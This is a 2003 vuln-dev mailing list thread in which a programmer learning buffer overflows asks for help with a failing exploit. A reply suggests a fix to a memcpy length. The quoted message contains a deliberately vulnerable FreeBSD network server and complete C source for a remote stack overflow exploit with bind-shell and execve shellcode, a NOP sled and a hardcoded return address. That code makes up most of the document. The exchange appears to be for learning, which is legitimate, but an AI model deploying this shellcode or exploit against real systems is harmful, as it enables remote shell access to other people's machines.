Re: sample buffer overflow exploit problem

[Ganbold <ganbold () micom mng net>]

Thanks, Yes, that's true, I can avoid string end null byte just as you said.
Is there any other problem in my code?

Ganbold


At 04:09 AM 9/28/2003 +0300, you wrote:
> Hi.
>
> I read your sample exploit code
> >//copying shellcode into buffer
> >memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));
> >
> >// the previous statement causes a unintential Nullbyte at buffer[1000]
> >buffer[1000] = 0x90;
>
> You can avoid memcpy copying the string null terminator byte by simply
> decrementing the
> length to copy (3'rd paramter) by 1 like this:
>
> memcpy(buffer + 1001 - sizeof(shellcode) , shellcode, sizeof(shellcode) -
> 1);
>
>
> ----- Original Message -----
> From: "Ganbold" <ganbold () micom mng net>
> To: <vuln-dev () securityfocus com>
> Sent: Saturday, September 27, 2003 10:54 AM
> Subject: sample buffer overflow exploit problem
>
>
> > Hi,
> >
> > I'm very new to buffer overflow exploit technics and my boss wants me to
> > thoroughly understand
> > how it works. I'm trying to exploit sample network server in FreeBSD 5.1
> > for this purpose.
> > When I try to exploit using execve /bin/sh (shellcode1), it works and
> > launches the shell in the remote machine.
> > However when I try to use port binding shell code, it binds shell to the
> > port, but when I try to connect to
> > it, it just closes the connection. Also I can't connect to bind port after
> > sending buffer using following code snippets:
> > ..............
> > printf("[-] Connecting to bindshell...\n");
> > remote.sin_family = AF_INET;
> > remote.sin_addr = *((struct in_addr *)host->h_addr);
> > remote.sin_port = htons(12345);
> > if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> > {
> > close(s);
> > fprintf(stderr, "Error: connect\n");
> > return -1;
> > }
> > exec_sh(s);
> > ...............
> >
> > I appreciate if somebody give me some help to solve this test problem.
> > Is there anywhere I can find detailed explanation about buffer overflows
> > and working sample network exploits?
> > Is there anyway I can generate shellcodes in FreeBSD?
> >
> > I attached my sample server code and exploit code.
> >
> > thanks in advance,
> >
> > Ganbold Ts,
> >
> > senior programmer,
> > Micom Co., Ltd
> > Ulaanbaatar,
> > Mongolia
> >
> >
> >
> > Following is network server code:
> > --------------------------------------------------------------------------
> ------------------------------------------------------
> > #include <stdio.h>
> > #include <netinet/in.h>
> > #include <netdb.h>
> > #include <sys/socket.h>
> > #include <sys/types.h>
> > #include <errno.h>
> >
> > #define BUFFER_SIZE 1024
> > #define NAME_SIZE 2048
> >
> > int handle(int c)
> > {
> > char buffer[BUFFER_SIZE], name[NAME_SIZE];
> > int bytes;
> > strcpy(buffer, "Your name?: ");
> > bytes = send(c, buffer, strlen(buffer), 0);
> > if (bytes == -1)
> > return -1;
> > bytes = recv(c, name, sizeof(name), 0);
> > if (bytes == -1)
> > return -1;
> > name[bytes - 1] = '\0';
> > sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
> > bytes = send(c, buffer, strlen(buffer), 0);
> > if (bytes == -1)
> > return -1;
> > return 0;
> > }
> >
> >
> > int main(int argc, char *argv[])
> > {
> > int s, c, cli_size;
> > struct sockaddr_in srv, cli;
> > if (argc != 2)
> > {
> > fprintf(stderr, "usage: %s port\n", argv[0]);
> > return 1;
> > }
> > s = socket(AF_INET, SOCK_STREAM, 0);
> > if (s == -1)
> > {
> > perror("socket() failed");
> > return 2;
> > }
> > srv.sin_addr.s_addr = INADDR_ANY;
> > srv.sin_port = htons( (unsigned short int) atol(argv[1]));
> > srv.sin_family = AF_INET;
> > if (bind(s, &srv, sizeof(srv)) == -1)
> > {
> > perror("bind() failed");
> > return 3;
> > }
> > if (listen(s, 3) == -1)
> > {
> > perror("listen() failed");
> > return 4;
> > }
> > for(;;)
> > {
> > c = accept(s, &cli, &cli_size);
> > if (c == -1)
> > {
> > perror("accept() failed");
> > return 5;
> > }
> > fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr));
> > if (handle(c) == -1)
> > fprintf(stderr, "%s: handle() failed", argv[0]);
> > close(c);
> > }
> > return 0;
> > }
> > --------------------------------------------------------------------------
> ------------------------------------------------------
> >
> > Following is the sample exploit code:
> > --------------------------------------------------------------------------
> ------------------------------------------------------
> > #include <stdio.h>
> > #include <netinet/in.h>
> > #include <netdb.h>
> > #include <sys/socket.h>
> > #include <sys/types.h>
> > #include <errno.h>
> > #include <unistd.h>
> >
> > /*
> >   * FreeBSD shellcode - binds /bin/sh to a port 12345
> >   *
> >   * Claes M. Nyberg 20020619
> >   *
> >   * <cmn () darklab org>, <md0claes () mdstud chalmers se>
> >   */
> > char shellcode[]
> > =
> > /* port _______*/
> > "\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
> > "\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
> > "\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
> > "\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
> > "\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
> > "\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
> > "\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
> > "\x40\x50\x50\xcd\x80";
> >
> > /*
> >   * FreeBSD shellcode - execve /bin/sh
> >   *
> >   * Claes M. Nyberg 20020120
> >   *
> >   * <cmn () darklab org>, <md0claes () mdstud chalmers se>
> >   */
> > char shellcode1[] =
> >      "\x31\xc0"               /* xorl    %eax, %eax  */
> >      "\x50"                   /* pushl   %eax        */
> >      "\x68\x2f\x2f\x73\x68"   /* pushl   $0x68732f2f */
> >      "\x68\x2f\x62\x69\x6e"   /* pushl   $0x6e69622f */
> >      "\x89\xe3"               /* movl    %esp, %ebx  */
> >      "\x50"                   /* pushl   %eax        */
> >      "\x53"                   /* pushl   %ebx        */
> >      "\x89\xe2"               /* movl    %esp, %edx  */
> >      "\x50"                   /* pushl   %eax        */
> >      "\x52"                   /* pushl   %edx        */
> >      "\x53"                   /* pushl   %ebx        */
> >      "\x50"                   /* pushl   %eax        */
> >      "\xb0\x3b"               /* movb    $0x3b, %al  */
> >      "\xcd\x80"               /* int     $0x80       */
> >      "\x31\xc0"               /* xorl    %eax, %eax  */
> >      "\x40"                   /* inc     %eax        */
> >      "\x50"                   /* pushl   %eax        */
> >      "\x50"                   /* pushl   %eax        */
> >      "\xcd\x80";              /* int     $0x80       */
> >
> > #define RET 0xbfbffa48
> >
> > int exec_sh(int sockfd)
> > {
> >          char snd[4096],rcv[4096];
> >          fd_set rset;
> >          while(1)
> >          {
> >                  FD_ZERO(&rset);
> >                  FD_SET(fileno(stdin),&rset);
> >                  FD_SET(sockfd,&rset);
> >                  select(255,&rset,NULL,NULL,NULL);
> >                  if(FD_ISSET(fileno(stdin),&rset))
> >                  {
> >                          memset(snd,0,sizeof(snd));
> >                          fgets(snd,sizeof(snd),stdin);
> >                          write(sockfd,snd,strlen(snd));
> >                  }
> >                  if(FD_ISSET(sockfd,&rset))
> >                  {
> >                          memset(rcv,0,sizeof(rcv));
> >                          if(read(sockfd,rcv,sizeof(rcv))<=0)
> >                                  exit(0);
> >                          fputs(rcv,stdout);
> >                  }
> >          }
> > }
> >
> > int main(int argc, char *argv[]) {
> >
> > char buffer[1064];
> > int s,t, i, size;
> > struct sockaddr_in remote;
> > struct hostent *host;
> >
> > if(argc != 3) {
> > printf("Usage: %s target-ip port\n", argv[0]);
> > return -1;
> > }
> >
> > // filling buffer with NOPs
> > memset(buffer, 0x90, 1064);
> >
> > //copying shellcode into buffer
> > memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));
> >
> > // the previous statement causes a unintential Nullbyte at buffer[1000]
> > buffer[1000] = 0x90;
> >
> > // Copying the return address multiple times at the end of the buffer...
> > for(i=1022; i < 1059; i+=4) {
> > * ((int *) &buffer[i]) = RET;
> > }
> >
> > buffer[1063] = 0x0;
> >
> > //getting hostname
> >
> > host=gethostbyname(argv[1]);
> > if (host==NULL)
> > {
> > fprintf(stderr, "Unknown Host %s\n",argv[1]);
> > return -1;
> > }
> >
> > // creating socket...
> > s = socket(AF_INET, SOCK_STREAM, 0);
> > if (s < 0)
> > {
> > fprintf(stderr, "Error: Socket\n");
> > return -1;
> > }
> > remote.sin_family = AF_INET;
> > remote.sin_addr = *((struct in_addr *)host->h_addr);
> > remote.sin_port = htons(atoi(argv[2]));
> > // connecting with destination host
> > if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> > {
> > close(s);
> > fprintf(stderr, "Error: connect\n");
> > return -1;
> > }
> > //sending exploit string
> > size = send(s, buffer, sizeof(buffer), 0);
> > if (size==-1)
> > {
> > close(s);
> > fprintf(stderr, "sending data failed\n");
> > return -1;
> > }
> > /*
> > printf("[-] Connecting to bindshell...\n");
> > remote.sin_family = AF_INET;
> > remote.sin_addr = *((struct in_addr *)host->h_addr);
> > remote.sin_port = htons(12345);
> > if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> > {
> > close(s);
> > fprintf(stderr, "Error: connect\n");
> > return -1;
> > }
> > exec_sh(s);
> > */
> > // closing socket
> > close(s);
> > }
> >
> > --------------------------------------------------------------------------
> ------------------------------------------------------
> >
> >
> >
> >